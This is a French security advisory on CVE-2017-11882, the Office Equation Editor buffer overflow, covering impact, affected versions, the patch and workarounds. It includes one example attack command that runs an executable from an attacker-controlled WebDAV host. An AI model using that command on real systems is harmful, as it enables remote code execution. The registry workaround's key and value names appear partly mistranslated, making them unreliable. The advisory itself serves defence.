Une vulnérabilité de dépassement de tampon de criticité élevée a été identifiée sur les produits Microsoft Office.

Une vulnérabilité de dépassement de tampon (Stack Buffer Overflow) a été découverte sur le composant Microsoft Equation Editor utilisé dans les documents Microsoft Office.

Microsoft Equation Editor est un serveur COM lancé par l’exécutable eqnedt32.exe et est présent sur toutes les versions de Microsoft Office depuis Office 2000. L’exécutable n’utilise pas les fonctionnalités de protection modernes contre les exploitations mémoire et est vulnérable à une attaque par dépassement de tampon. L’absence de protections sur le binaire et la présence de celui-ci sur toutes les versions d’Office depuis Microsoft Office 2000 rendent importante la probabilité d’exploitation de la vulnérabilité. De plus, cette vulnérabilité peut être exploitée sur toutes les versions du système d’exploitation Windows, y compris la dernière mise à jour « Microsoft Windows 10 Creators Update ». 

Cette vulnérabilité, portant la référence CVE-2017-11882, a été découverte par des chercheurs en sécurité de chez Embedi. Elle affecte plus spécifiquement l’exécutable EQNEDT32.EXE qui permet l’insertion et l’édition des objets OLE dans les documents MS Office. Le composant ne traite pas correctement les objets OLE en mémoire, ce qui pourrait permettre à un attaquant d’exécuter du code avec les privilèges de l’utilisateur authentifié.

Pour l’exploiter, un attaquant doit inciter les utilisateurs à ouvrir un fichier malveillant spécialement conçu contenant plusieurs objets OLE qui exploitent la vulnérabilité pour exécuter une séquence arbitraire de commandes sur le poste.

Une attaque simple consisterait à lancer un fichier exécutable depuis un serveur WebDAV contrôlé par l’attaquant en utilisant la commande «\\ attacker_ip\ff\1.exe». Le mécanisme de démarrage du fichier exécutable est similaire à celui du service «\\live.sysinternals.com\tools».

Informations
+

Impact

  • Exécution de code arbitraire à distance.

Criticité

  • CVSS v3 : 7.5

Existence d’un code d’exploitation de la vulnérabilité

Pour plus d’informations sur l’exploitation de cette vulnérabilité, une démonstration vidéo a été publiée par Embedi : https://www.youtube.com/watch?v=LNFG0lktXQI

Composants & versions vulnérables

  • Microsoft Office 2016 (64-bit edition)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2010 (64-bit edition) SP2
  • Microsoft Office 2010 (32-bit edition) SP2
  • Microsoft Office 2007 SP3

CVE

  • CVE-2017-11882

Recommandations
+

Correctifs

Microsoft a corrigé la vulnérabilité dans son patch Tuesday de novembre. (https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/bae9d0d8-e497-e711-80e5-000d3a32fc99), en modifiant la façon dont le composant affecté gère les objets en mémoire.

Solution de contournement

En l’absence de mises à jour, il est possible de se protéger contre la vulnérabilité des deux façons suivantes :  

  • En désactivant Microsoft Equation Editor dans Office
    Le composant Microsoft Equation Editor vulnérable peut être désactivé dans Microsoft Office en paramétrant les clefs de registre suivantes :
    • HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Office \ Common \ Compatibilité COM \ {0002CE02-0000-0000-C000-000000000046}] 
      " Indicateurs de compatibilité" = dword: 00000400 
    • [HKEY_LOCAL_MACHINE \ SOFTWARE \ Wow6432Node \ Microsoft \ Office \ Common \ COM Compatibility \ {0002CE02-0000-0000-C000-000000000046}] " Indicateurs de 
      compatibilité" = dword: 00000400
  • En ajoutant des protections via EMET ou Windows Defender Exploit Guard contre eqnedt32.exe
    L'exploitation de Microsoft Equation Editor peut être évitée en appliquant des règles sur l’exécutable eqnedt32.exe : https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-i…

L’activation de l’ASLR devrait également permettre de bloquer l'attaque par réutilisation de code qui est présentée dans la publication d’Embedi : https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-did…